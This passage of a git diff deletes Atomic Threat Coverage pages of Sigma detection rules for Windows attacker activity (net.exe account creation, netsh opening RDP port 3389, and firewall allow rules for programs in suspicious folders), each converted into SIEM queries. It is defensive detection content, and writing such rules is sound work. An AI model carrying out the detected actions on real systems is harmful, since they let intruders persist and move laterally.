-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.Image.keyword:(*\\\\net.exe OR *\\\\net1.exe) AND winlog.event_data.CommandLine.keyword:*user* AND winlog.event_data.CommandLine.keyword:*add*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Net.exe User Account Creation'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\nComputerName = {{_source.ComputerName}}\n        User = {{_source.User}}\n CommandLine = {{_source.CommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(Image.keyword:(*\\net.exe *\\net1.exe) AND CommandLine.keyword:*user* AND CommandLine.keyword:*add*)
-```
-
-
-### splunk
-    
-```
-((Image="*\\net.exe" OR Image="*\\net1.exe") CommandLine="*user*" CommandLine="*add*") | table ComputerName,User,CommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="1" Image IN ["*\\net.exe", "*\\net1.exe"] CommandLine="*user*" CommandLine="*add*")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*.*\net\.exe|.*.*\net1\.exe))(?=.*.*user.*)(?=.*.*add.*))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_netsh_allow_port_rdp.md b/Atomic_Threat_Coverage/Detection_Rules/win_netsh_allow_port_rdp.md
deleted file mode 100644
index c7e12a0..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_netsh_allow_port_rdp.md
+++ /dev/null
@@ -1,184 +0,0 @@
-| Title                    | Netsh RDP Port Opening       |
-|:-------------------------|:------------------|
-| **Description**          | Detects netsh commands that opens the port 3389 used for RDP, used in Sarwent Malware |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0011: Command and Control](https://attack.mitre.org/tactics/TA0011)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1076: Remote Desktop Protocol](https://attack.mitre.org/techniques/T1076)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Legitimate administration</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://labs.sentinelone.com/sarwent-malware-updates-command-detonation/](https://labs.sentinelone.com/sarwent-malware-updates-command-detonation/)</li></ul>  |
-| **Author**               | Sander Wiebing |
-| Other Tags           | <ul><li>attack.t1021.001</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Netsh RDP Port Opening
-id: 01aeb693-138d-49d2-9403-c4f52d7d3d62
-description: Detects netsh commands that opens the port 3389 used for RDP, used in Sarwent Malware
-references:
-    - https://labs.sentinelone.com/sarwent-malware-updates-command-detonation/
-date: 2020/05/23
-tags:
-    - attack.command_and_control
-    - attack.t1076
-    - attack.t1021.001
-status: experimental
-author: Sander Wiebing
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection1:
-        CommandLine|contains|all:
-            - netsh
-            - firewall add portopening
-            - tcp 3389
-    selection2:
-        CommandLine|contains|all:
-            - netsh
-            - advfirewall firewall add rule
-            - action=allow
-            - protocol=TCP
-            - localport=3389
-    condition: 1 of them
-falsepositives:
-    - Legitimate administration
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "CommandLine.*.*netsh.*" -and (($_.message -match "CommandLine.*.*firewall add portopening.*" -and $_.message -match "CommandLine.*.*tcp 3389.*") -or ($_.message -match "CommandLine.*.*advfirewall firewall add rule.*" -and $_.message -match "CommandLine.*.*action=allow.*" -and $_.message -match "CommandLine.*.*protocol=TCP.*" -and $_.message -match "CommandLine.*.*localport=3389.*"))) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.CommandLine.keyword:*netsh* AND ((winlog.event_data.CommandLine.keyword:*firewall\ add\ portopening* AND winlog.event_data.CommandLine.keyword:*tcp\ 3389*) OR (winlog.event_data.CommandLine.keyword:*advfirewall\ firewall\ add\ rule* AND winlog.event_data.CommandLine.keyword:*action\=allow* AND winlog.event_data.CommandLine.keyword:*protocol\=TCP* AND winlog.event_data.CommandLine.keyword:*localport\=3389*)))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/01aeb693-138d-49d2-9403-c4f52d7d3d62 <<EOF
-{
-  "metadata": {
-    "title": "Netsh RDP Port Opening",
-    "description": "Detects netsh commands that opens the port 3389 used for RDP, used in Sarwent Malware",
-    "tags": [
-      "attack.command_and_control",
-      "attack.t1076",
-      "attack.t1021.001"
-    ],
-    "query": "(winlog.event_data.CommandLine.keyword:*netsh* AND ((winlog.event_data.CommandLine.keyword:*firewall\\ add\\ portopening* AND winlog.event_data.CommandLine.keyword:*tcp\\ 3389*) OR (winlog.event_data.CommandLine.keyword:*advfirewall\\ firewall\\ add\\ rule* AND winlog.event_data.CommandLine.keyword:*action\\=allow* AND winlog.event_data.CommandLine.keyword:*protocol\\=TCP* AND winlog.event_data.CommandLine.keyword:*localport\\=3389*)))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.CommandLine.keyword:*netsh* AND ((winlog.event_data.CommandLine.keyword:*firewall\\ add\\ portopening* AND winlog.event_data.CommandLine.keyword:*tcp\\ 3389*) OR (winlog.event_data.CommandLine.keyword:*advfirewall\\ firewall\\ add\\ rule* AND winlog.event_data.CommandLine.keyword:*action\\=allow* AND winlog.event_data.CommandLine.keyword:*protocol\\=TCP* AND winlog.event_data.CommandLine.keyword:*localport\\=3389*)))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Netsh RDP Port Opening'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(CommandLine.keyword:*netsh* AND ((CommandLine.keyword:*firewall add portopening* AND CommandLine.keyword:*tcp 3389*) OR (CommandLine.keyword:*advfirewall firewall add rule* AND CommandLine.keyword:*action=allow* AND CommandLine.keyword:*protocol=TCP* AND CommandLine.keyword:*localport=3389*)))
-```
-
-
-### splunk
-    
-```
-(CommandLine="*netsh*" ((CommandLine="*firewall add portopening*" CommandLine="*tcp 3389*") OR (CommandLine="*advfirewall firewall add rule*" CommandLine="*action=allow*" CommandLine="*protocol=TCP*" CommandLine="*localport=3389*")))
-```
-
-
-### logpoint
-    
-```
-(event_id="1" CommandLine="*netsh*" ((CommandLine="*firewall add portopening*" CommandLine="*tcp 3389*") OR (CommandLine="*advfirewall firewall add rule*" CommandLine="*action=allow*" CommandLine="*protocol=TCP*" CommandLine="*localport=3389*")))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*.*netsh.*)(?=.*(?:.*(?:.*(?:.*(?=.*.*firewall add portopening.*)(?=.*.*tcp 3389.*))|.*(?:.*(?=.*.*advfirewall firewall add rule.*)(?=.*.*action=allow.*)(?=.*.*protocol=TCP.*)(?=.*.*localport=3389.*))))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_netsh_fw_add.md b/Atomic_Threat_Coverage/Detection_Rules/win_netsh_fw_add.md
deleted file mode 100644
index 6175a51..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_netsh_fw_add.md
+++ /dev/null
@@ -1,179 +0,0 @@
-| Title                    | Netsh Port or Application Allowed       |
-|:-------------------------|:------------------|
-| **Description**          | Allow Incoming Connections by Port or Application on Windows Firewall |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0008: Lateral Movement](https://attack.mitre.org/tactics/TA0008)</li><li>[TA0011: Command and Control](https://attack.mitre.org/tactics/TA0011)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1090: Proxy](https://attack.mitre.org/techniques/T1090)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>Legitimate administration</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://attack.mitre.org/software/S0246/ (Lazarus HARDRAIN)](https://attack.mitre.org/software/S0246/ (Lazarus HARDRAIN))</li><li>[https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-RAT-and-Staging-Report.pdf](https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-RAT-and-Staging-Report.pdf)</li></ul>  |
-| **Author**               | Markus Neis, Sander Wiebing |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Netsh Port or Application Allowed
-id: cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c
-description: Allow Incoming Connections by Port or Application on Windows Firewall
-references:
-    - https://attack.mitre.org/software/S0246/ (Lazarus HARDRAIN)
-    - https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-RAT-and-Staging-Report.pdf
-date: 2019/01/29
-tags:
-    - attack.lateral_movement
-    - attack.command_and_control
-    - attack.t1090 
-status: experimental
-author: Markus Neis, Sander Wiebing
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection1:
-        CommandLine:
-            - '*netsh*'
-    selection2:
-        CommandLine:
-            - '*firewall add*'
-    condition: selection1 and selection2
-falsepositives:
-    - Legitimate administration
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "CommandLine.*.*netsh.*") -and ($_.message -match "CommandLine.*.*firewall add.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.CommandLine.keyword:(*netsh*) AND winlog.event_data.CommandLine.keyword:(*firewall\ add*))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c <<EOF
-{
-  "metadata": {
-    "title": "Netsh Port or Application Allowed",
-    "description": "Allow Incoming Connections by Port or Application on Windows Firewall",
-    "tags": [
-      "attack.lateral_movement",
-      "attack.command_and_control",
-      "attack.t1090"
-    ],
-    "query": "(winlog.event_data.CommandLine.keyword:(*netsh*) AND winlog.event_data.CommandLine.keyword:(*firewall\\ add*))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.CommandLine.keyword:(*netsh*) AND winlog.event_data.CommandLine.keyword:(*firewall\\ add*))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Netsh Port or Application Allowed'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(CommandLine.keyword:(*netsh*) AND CommandLine.keyword:(*firewall add*))
-```
-
-
-### splunk
-    
-```
-((CommandLine="*netsh*") (CommandLine="*firewall add*"))
-```
-
-
-### logpoint
-    
-```
-(event_id="1" CommandLine IN ["*netsh*"] CommandLine IN ["*firewall add*"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*.*netsh.*))(?=.*(?:.*.*firewall add.*)))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_netsh_fw_add_susp_image.md b/Atomic_Threat_Coverage/Detection_Rules/win_netsh_fw_add_susp_image.md
deleted file mode 100644
index a04ffac..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_netsh_fw_add_susp_image.md
+++ /dev/null
@@ -1,206 +0,0 @@
-| Title                    | Netsh Program Allowed with Suspcious Location       |
-|:-------------------------|:------------------|
-| **Description**          | Detects Netsh commands that allows a suspcious application location on Windows Firewall |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0008: Lateral Movement](https://attack.mitre.org/tactics/TA0008)</li><li>[TA0011: Command and Control](https://attack.mitre.org/tactics/TA0011)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1090: Proxy](https://attack.mitre.org/techniques/T1090)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Legitimate administration</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://www.virusradar.com/en/Win32_Kasidet.AD/description](https://www.virusradar.com/en/Win32_Kasidet.AD/description)</li><li>[https://www.hybrid-analysis.com/sample/07e789f4f2f3259e7559fdccb36e96814c2dbff872a21e1fa03de9ee377d581f?environmentId=100](https://www.hybrid-analysis.com/sample/07e789f4f2f3259e7559fdccb36e96814c2dbff872a21e1fa03de9ee377d581f?environmentId=100)</li></ul>  |
-| **Author**               | Sander Wiebing |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Netsh Program Allowed with Suspcious Location
-id: a35f5a72-f347-4e36-8895-9869b0d5fc6d 
-description: Detects Netsh commands that allows a suspcious application location on Windows Firewall
-references:
-    - https://www.virusradar.com/en/Win32_Kasidet.AD/description
-    - https://www.hybrid-analysis.com/sample/07e789f4f2f3259e7559fdccb36e96814c2dbff872a21e1fa03de9ee377d581f?environmentId=100
-date: 2020/05/25
-tags:
-    - attack.lateral_movement
-    - attack.command_and_control
-    - attack.t1090 
-status: experimental
-author: Sander Wiebing
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection1:
-        CommandLine|contains|all:
-            - 'netsh'
-            - 'firewall add allowedprogram'
-    selection2:
-        CommandLine|contains|all:
-            - netsh
-            - advfirewall firewall add rule
-            - action=allow
-            - program=
-    susp_image:
-        CommandLine|contains:
-            - '*%TEMP%*'
-            - '*:\RECYCLER\\*'
-            - '*C:\$Recycle.bin\\*'
-            - '*:\SystemVolumeInformation\\*'
-            - 'C:\\Windows\\Tasks\\*'
-            - 'C:\\Windows\\debug\\*'
-            - 'C:\\Windows\\fonts\\*'
-            - 'C:\\Windows\\help\\*'
-            - 'C:\\Windows\\drivers\\*'
-            - 'C:\\Windows\\addins\\*'
-            - 'C:\\Windows\\cursors\\*'
-            - 'C:\\Windows\\system32\tasks\\*'
-            - '*C:\Windows\Temp\\*'
-            - '*C:\Temp\\*'
-            - '*C:\Users\Public\\*'
-            - '%Public%\\*'
-            - '*C:\Users\Default\\*'
-            - '*C:\Users\Desktop\\*'
-            - '*\Downloads\\*'
-            - '*\Temporary Internet Files\Content.Outlook\\*'
-            - '*\Local Settings\Temporary Internet Files\\*'
-    condition: (selection1 or selection2) and susp_image
-falsepositives:
-    - Legitimate administration
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "CommandLine.*.*netsh.*" -and ($_.message -match "CommandLine.*.*firewall add allowedprogram.*" -or ($_.message -match "CommandLine.*.*advfirewall firewall add rule.*" -and $_.message -match "CommandLine.*.*action=allow.*" -and $_.message -match "CommandLine.*.*program=.*")) -and ($_.message -match "CommandLine.*.*%TEMP%.*" -or $_.message -match "CommandLine.*.*:\\RECYCLER\\.*" -or $_.message -match "CommandLine.*.*C:\\$Recycle.bin\\.*" -or $_.message -match "CommandLine.*.*:\\SystemVolumeInformation\\.*" -or $_.message -match "CommandLine.*.*C:\\Windows\\Tasks\\.*" -or $_.message -match "CommandLine.*.*C:\\Windows\\debug\\.*" -or $_.message -match "CommandLine.*.*C:\\Windows\\fonts\\.*" -or $_.message -match "CommandLine.*.*C:\\Windows\\help\\.*" -or $_.message -match "CommandLine.*.*C:\\Windows\\drivers\\.*" -or $_.message -match "CommandLine.*.*C:\\Windows\\addins\\.*" -or $_.message -match "CommandLine.*.*C:\\Windows\\cursors\\.*" -or $_.message -match "CommandLine.*.*C:\\Windows\\system32\\tasks\\.*" -or $_.message -match "CommandLine.*.*C:\\Windows\\Temp\\.*" -or $_.message -match "CommandLine.*.*C:\\Temp\\.*" -or $_.message -match "CommandLine.*.*C:\\Users\\Public\\.*" -or $_.message -match "CommandLine.*.*%Public%\\.*" -or $_.message -match "CommandLine.*.*C:\\Users\\Default\\.*" -or $_.message -match "CommandLine.*.*C:\\Users\\Desktop\\.*" -or $_.message -match "CommandLine.*.*\\Downloads\\.*" -or $_.message -match "CommandLine.*.*\\Temporary Internet Files\\Content.Outlook\\.*" -or $_.message -match "CommandLine.*.*\\Local Settings\\Temporary Internet Files\\.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.CommandLine.keyword:*netsh* AND (winlog.event_data.CommandLine.keyword:*firewall\ add\ allowedprogram* OR (winlog.event_data.CommandLine.keyword:*advfirewall\ firewall\ add\ rule* AND winlog.event_data.CommandLine.keyword:*action\=allow* AND winlog.event_data.CommandLine.keyword:*program\=*)) AND winlog.event_data.CommandLine.keyword:(*%TEMP%* OR *\:\\RECYCLER\\* OR *C\:\\$Recycle.bin\\* OR *\:\\SystemVolumeInformation\\* OR *C\:\\Windows\\Tasks\\* OR *C\:\\Windows\\debug\\* OR *C\:\\Windows\\fonts\\* OR *C\:\\Windows\\help\\* OR *C\:\\Windows\\drivers\\* OR *C\:\\Windows\\addins\\* OR *C\:\\Windows\\cursors\\* OR *C\:\\Windows\\system32\\tasks\\* OR *C\:\\Windows\\Temp\\* OR *C\:\\Temp\\* OR *C\:\\Users\\Public\\* OR *%Public%\\* OR *C\:\\Users\\Default\\* OR *C\:\\Users\\Desktop\\* OR *\\Downloads\\* OR *\\Temporary\ Internet\ Files\\Content.Outlook\\* OR *\\Local\ Settings\\Temporary\ Internet\ Files\\*))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/a35f5a72-f347-4e36-8895-9869b0d5fc6d <<EOF
-{
-  "metadata": {
-    "title": "Netsh Program Allowed with Suspcious Location",
-    "description": "Detects Netsh commands that allows a suspcious application location on Windows Firewall",
-    "tags": [
-      "attack.lateral_movement",
-      "attack.command_and_control",
-      "attack.t1090"
-    ],
-    "query": "(winlog.event_data.CommandLine.keyword:*netsh* AND (winlog.event_data.CommandLine.keyword:*firewall\\ add\\ allowedprogram* OR (winlog.event_data.CommandLine.keyword:*advfirewall\\ firewall\\ add\\ rule* AND winlog.event_data.CommandLine.keyword:*action\\=allow* AND winlog.event_data.CommandLine.keyword:*program\\=*)) AND winlog.event_data.CommandLine.keyword:(*%TEMP%* OR *\\:\\\\RECYCLER\\\\* OR *C\\:\\\\$Recycle.bin\\\\* OR *\\:\\\\SystemVolumeInformation\\\\* OR *C\\:\\\\Windows\\\\Tasks\\\\* OR *C\\:\\\\Windows\\\\debug\\\\* OR *C\\:\\\\Windows\\\\fonts\\\\* OR *C\\:\\\\Windows\\\\help\\\\* OR *C\\:\\\\Windows\\\\drivers\\\\* OR *C\\:\\\\Windows\\\\addins\\\\* OR *C\\:\\\\Windows\\\\cursors\\\\* OR *C\\:\\\\Windows\\\\system32\\\\tasks\\\\* OR *C\\:\\\\Windows\\\\Temp\\\\* OR *C\\:\\\\Temp\\\\* OR *C\\:\\\\Users\\\\Public\\\\* OR *%Public%\\\\* OR *C\\:\\\\Users\\\\Default\\\\* OR *C\\:\\\\Users\\\\Desktop\\\\* OR *\\\\Downloads\\\\* OR *\\\\Temporary\\ Internet\\ Files\\\\Content.Outlook\\\\* OR *\\\\Local\\ Settings\\\\Temporary\\ Internet\\ Files\\\\*))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.CommandLine.keyword:*netsh* AND (winlog.event_data.CommandLine.keyword:*firewall\\ add\\ allowedprogram* OR (winlog.event_data.CommandLine.keyword:*advfirewall\\ firewall\\ add\\ rule* AND winlog.event_data.CommandLine.keyword:*action\\=allow* AND winlog.event_data.CommandLine.keyword:*program\\=*)) AND winlog.event_data.CommandLine.keyword:(*%TEMP%* OR *\\:\\\\RECYCLER\\\\* OR *C\\:\\\\$Recycle.bin\\\\* OR *\\:\\\\SystemVolumeInformation\\\\* OR *C\\:\\\\Windows\\\\Tasks\\\\* OR *C\\:\\\\Windows\\\\debug\\\\* OR *C\\:\\\\Windows\\\\fonts\\\\* OR *C\\:\\\\Windows\\\\help\\\\* OR *C\\:\\\\Windows\\\\drivers\\\\* OR *C\\:\\\\Windows\\\\addins\\\\* OR *C\\:\\\\Windows\\\\cursors\\\\* OR *C\\:\\\\Windows\\\\system32\\\\tasks\\\\* OR *C\\:\\\\Windows\\\\Temp\\\\* OR *C\\:\\\\Temp\\\\* OR *C\\:\\\\Users\\\\Public\\\\* OR *%Public%\\\\* OR *C\\:\\\\Users\\\\Default\\\\* OR *C\\:\\\\Users\\\\Desktop\\\\* OR *\\\\Downloads\\\\* OR *\\\\Temporary\\ Internet\\ Files\\\\Content.Outlook\\\\* OR *\\\\Local\\ Settings\\\\Temporary\\ Internet\\ Files\\\\*))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Netsh Program Allowed with Suspcious Location'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(CommandLine.keyword:*netsh* AND (CommandLine.keyword:*firewall add allowedprogram* OR (CommandLine.keyword:*advfirewall firewall add rule* AND CommandLine.keyword:*action=allow* AND CommandLine.keyword:*program=*)) AND CommandLine.keyword:(*%TEMP%* *\:\\RECYCLER\\* *C\:\\$Recycle.bin\\* *\:\\SystemVolumeInformation\\* *C\:\\Windows\\Tasks\\* *C\:\\Windows\\debug\\* *C\:\\Windows\\fonts\\* *C\:\\Windows\\help\\* *C\:\\Windows\\drivers\\* *C\:\\Windows\\addins\\* *C\:\\Windows\\cursors\\* *C\:\\Windows\\system32\\tasks\\* *C\:\\Windows\\Temp\\* *C\:\\Temp\\* *C\:\\Users\\Public\\* *%Public%\\* *C\:\\Users\\Default\\* *C\:\\Users\\Desktop\\* *\\Downloads\\* *\\Temporary Internet Files\\Content.Outlook\\* *\\Local Settings\\Temporary Internet Files\\*))
-```
-
-
-### splunk
-    
-```
-(CommandLine="*netsh*" (CommandLine="*firewall add allowedprogram*" OR (CommandLine="*advfirewall firewall add rule*" CommandLine="*action=allow*" CommandLine="*program=*")) (CommandLine="*%TEMP%*" OR CommandLine="*:\\RECYCLER\\*" OR CommandLine="*C:\\$Recycle.bin\\*" OR CommandLine="*:\\SystemVolumeInformation\\*" OR CommandLine="*C:\\Windows\\Tasks\\*" OR CommandLine="*C:\\Windows\\debug\\*" OR CommandLine="*C:\\Windows\\fonts\\*" OR CommandLine="*C:\\Windows\\help\\*" OR CommandLine="*C:\\Windows\\drivers\\*" OR CommandLine="*C:\\Windows\\addins\\*" OR CommandLine="*C:\\Windows\\cursors\\*" OR CommandLine="*C:\\Windows\\system32\\tasks\\*" OR CommandLine="*C:\\Windows\\Temp\\*" OR CommandLine="*C:\\Temp\\*" OR CommandLine="*C:\\Users\\Public\\*" OR CommandLine="*%Public%\\*" OR CommandLine="*C:\\Users\\Default\\*" OR CommandLine="*C:\\Users\\Desktop\\*" OR CommandLine="*\\Downloads\\*" OR CommandLine="*\\Temporary Internet Files\\Content.Outlook\\*" OR CommandLine="*\\Local Settings\\Temporary Internet Files\\*"))
-```
-
-
-### logpoint
-    
-```
-(event_id="1" CommandLine="*netsh*" (CommandLine="*firewall add allowedprogram*" OR (CommandLine="*advfirewall firewall add rule*" CommandLine="*action=allow*" CommandLine="*program=*")) CommandLine IN ["*%TEMP%*", "*:\\RECYCLER\\*", "*C:\\$Recycle.bin\\*", "*:\\SystemVolumeInformation\\*", "*C:\\Windows\\Tasks\\*", "*C:\\Windows\\debug\\*", "*C:\\Windows\\fonts\\*", "*C:\\Windows\\help\\*", "*C:\\Windows\\drivers\\*", "*C:\\Windows\\addins\\*", "*C:\\Windows\\cursors\\*", "*C:\\Windows\\system32\\tasks\\*", "*C:\\Windows\\Temp\\*", "*C:\\Temp\\*", "*C:\\Users\\Public\\*", "*%Public%\\*", "*C:\\Users\\Default\\*", "*C:\\Users\\Desktop\\*", "*\\Downloads\\*", "*\\Temporary Internet Files\\Content.Outlook\\*", "*\\Local Settings\\Temporary Internet Files\\*"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*.*netsh.*)(?=.*(?:.*(?:.*.*firewall add allowedprogram.*|.*(?:.*(?=.*.*advfirewall firewall add rule.*)(?=.*.*action=allow.*)(?=.*.*program=.*)))))(?=.*(?:.*.*%TEMP%.*|.*.*:\RECYCLER\\.*|.*.*C:\\$Recycle\.bin\\.*|.*.*:\SystemVolumeInformation\\.*|.*.*C:\\Windows\\Tasks\\.*|.*.*C:\\Windows\\debug\\.*|.*.*C:\\Windows\\fonts\\.*|.*.*C:\\Windows\\help\\.*|.*.*C:\\Windows\\drivers\\.*|.*.*C:\\Windows\\addins\\.*|.*.*C:\\Windows\\cursors\\.*|.*.*C:\\Windows\\system32\tasks\\.*|.*.*C:\Windows\Temp\\.*|.*.*C:\Temp\\.*|.*.*C:\Users\Public\\.*|.*.*%Public%\\.*|.*.*C:\Users\Default\\.*|.*.*C:\Users\Desktop\\.*|.*.*\Downloads\\.*|.*.*\Temporary Internet Files\Content\.Outlook\\.*|.*.*\Local Settings\Temporary Internet Files\\.*)))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_netsh_packet_capture.md b/Atomic_Threat_Coverage/Detection_Rules/win_netsh_packet_capture.md
deleted file mode 100644
index abe1855..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_netsh_packet_capture.md
+++ /dev/null
@@ -1,175 +0,0 @@
